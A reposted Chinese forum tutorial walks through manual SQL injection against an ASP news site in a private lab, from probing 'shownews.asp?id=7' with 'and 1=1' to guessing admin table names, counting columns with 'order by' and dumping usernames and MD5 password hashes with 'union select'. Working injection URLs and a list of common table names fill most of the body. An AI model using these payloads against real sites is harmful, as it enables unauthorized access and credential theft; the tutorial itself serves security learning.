设为首页 收藏本站
查看: 898|回复: 0

[经验分享] 网络安全系列之四 手工SQL注入(ASP)

[复制链接]

尚未签到

发表于 2018-10-17 09:54:19 | 显示全部楼层 |阅读模式
  SQL注入是***对数据库进行***的常用手段之一,其核心思想在于:***在正常的需要调用数据库数据的URL后面构造一段数据库查询代码,然后根据返回的结果,从而获得想要的某些数据。下面我们就对之前已经搭建好的***平台进行SQL注入,最终目的是获得网站的管理员账号和密码。目标服务器IP地址:192.168.80.129,***主机IP地址:192.168.80.128。
  (1)寻找注入点
  随便打开一个网页,注意观察URL。
DSC0000.png

  注入点必定是类似“http://192.168.80.129/shownews.asp?id=7”这类存在命令调用的页面,“shownews.asp?id=7”是页面传值,就是将“id=7”传到“shownews.asp”页面里进行处理。
  我们可以在这个URL后面加上and 1=1和and 1=2进行测试。
  http://192.168.80.129/shownews.asp?id=7 and 1=1 ,网页仍能正常显示。
  http://192.168.80.129/shownews.asp?id=7 and 1=2 ,网页无法正常显示。
  这就表明“asp?”把我们自己加上的“and 1=1”也作为一个命令参数进行了调用,那我们就可以来构造一些SQL语句来被调用执行,从而得到需要的信息,这就是所谓的注入漏洞。像这样可以调用命令参数的网页就称为注入点。
  (2)猜表名
  ***进行网站***的主要目的是获得网站管理员的用户名和密码,用户名和密码都是存放在后台数据库的某个表中,所以首先我们得猜出这个数据表的名字是什么。
  表名用的最多的是admin和admin_user,我们可以在注入点URL的后面加上这样一条语句来猜表名:
  http://192.168.80.129/shownews.asp?id=7 and (select count(*) from admin) > 0
  “select count(*) from admin”的意思是统计admin表中有几条记录,如果admin表存在,那么这条语句就会得到一个数值。用这个数值跟>0比较,结果肯定是成立的,所以此时网页应该正常显示。反之,如果admin表不存在,那么“select count(*) from admin”就得不到任何数值,跟>0比较,结果不成立,网页也就无法正常显示。
  如果网页不能正常显示,可以再换一个表名进行尝试,直到正常显示为止:
  http://192.168.80.129/shownews.asp?id=7 and (select count(*) from admin_user) > 0
  http://192.168.80.129/shownews.asp?id=7 and (select count(*) from manage_user) > 0
  这个网站的表名就是manage_user。
  常见表名主要有:admin sysadmin manger admin123 webadmin member manage_user
  注意:如果表名实在猜不出来,也可以使用明小子之类的工具来帮忙。
DSC0001.png

  (3)猜字段的数量
  下一步是猜这个表中哪个字段存放着用户名和密码,首先需要知道数据表中一共有几个字段。
  这里要用到“order by”语句,“order by”的本意是按某个字段排序,“order by 10”就是按第10个字段排序,如果第10个字段存在,那么网页就会正常显示,否则如果网页无法正常显示,则表明第10字段不存在。
  http://192.168.80.129/shownews.asp?id=7 order by 11
  通过这种方法可以猜出这个表一共有11个字段。
  (4)猜字段名
  下一步是需要知道哪个字段存放着用户名和密码,这里用到“union select”联合查询语句。
  http://192.168.80.129/shownews.asp?id=7 union select 1,2,3,4,5,6,7,8,9,10,11 from manage_user
  这里会将存放用户名和密码的字段爆出。
DSC0002.png

  存放用户名的字段一般叫username,存放密码的字段一般叫password,将第2和第3字段替换成这两个名字:
  http://192.168.80.129/shownews.asp?id=7 union select 1,username,password,4,5,6,7,8,9,10,11 from manage_user
  这时就将用户名和密码爆出了。
DSC0003.png

  (5)猜后台管理入口
  在这个2.0版的南方数据模板中,本身就带有“管理员登入”的链接。现在大多数网站不会这样设置的,所以这里一般要凭经验来猜,管理入口一般存放在名为admin的网站子目录下,输入下面的地址http://192.168.80.129/admin,就自动将管理入口显示出来了。
DSC0004.png

  在这里就可以用之前爆出的管理员账号和密码来登录,但是密码“3acdbb255b45d296”很明显是经过MD5加密的,如何才能解密呢?这将在下篇博文来介绍。


运维网声明 1、欢迎大家加入本站运维交流群:群②:261659950 群⑤:202807635 群⑦870801961 群⑧679858003
2、本站所有主题由该帖子作者发表,该帖子作者与运维网享有帖子相关版权
3、所有作品的著作权均归原作者享有,请您和我们一样尊重他人的著作权等合法权益。如果您对作品感到满意,请购买正版
4、禁止制作、复制、发布和传播具有反动、淫秽、色情、暴力、凶杀等内容的信息,一经发现立即删除。若您因此触犯法律,一切后果自负,我们对此不承担任何责任
5、所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其内容的准确性、可靠性、正当性、安全性、合法性等负责,亦不承担任何法律责任
6、所有作品仅供您个人学习、研究或欣赏,不得用于商业或者其他用途,否则,一切后果均由您自己承担,我们对此不承担任何法律责任
7、如涉及侵犯版权等问题,请您及时通知我们,我们将立即采取措施予以解决
8、联系人Email:admin@iyunv.com 网址:www.yunweiku.com

所有资源均系网友上传或者通过网络收集,我们仅提供一个展示、介绍、观摩学习的平台,我们不对其承担任何法律责任,如涉及侵犯版权等问题,请您及时通知我们,我们将立即处理,联系人Email:kefu@iyunv.com,QQ:1061981298 本贴地址:https://www.yunweiku.com/thread-622628-1-1.html 上篇帖子: T-sql语句中GO的作用及语法 下篇帖子: sql查询一张表的重复数据
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

扫码加入运维网微信交流群X

扫码加入运维网微信交流群

扫描二维码加入运维网微信交流群,最新一手资源尽在官方微信交流群!快快加入我们吧...

扫描微信二维码查看详情

客服E-mail:kefu@iyunv.com 客服QQ:1061981298


QQ群⑦:运维网交流群⑦ QQ群⑧:运维网交流群⑧ k8s群:运维网kubernetes交流群


提醒:禁止发布任何违反国家法律、法规的言论与图片等内容;本站内容均来自个人观点与网络等信息,非本站认同之观点.


本站大部分资源是网友从网上搜集分享而来,其版权均归原作者及其网站所有,我们尊重他人的合法权益,如有内容侵犯您的合法权益,请及时与我们联系进行核实删除!



合作伙伴: 青云cloud

快速回复 返回顶部 返回列表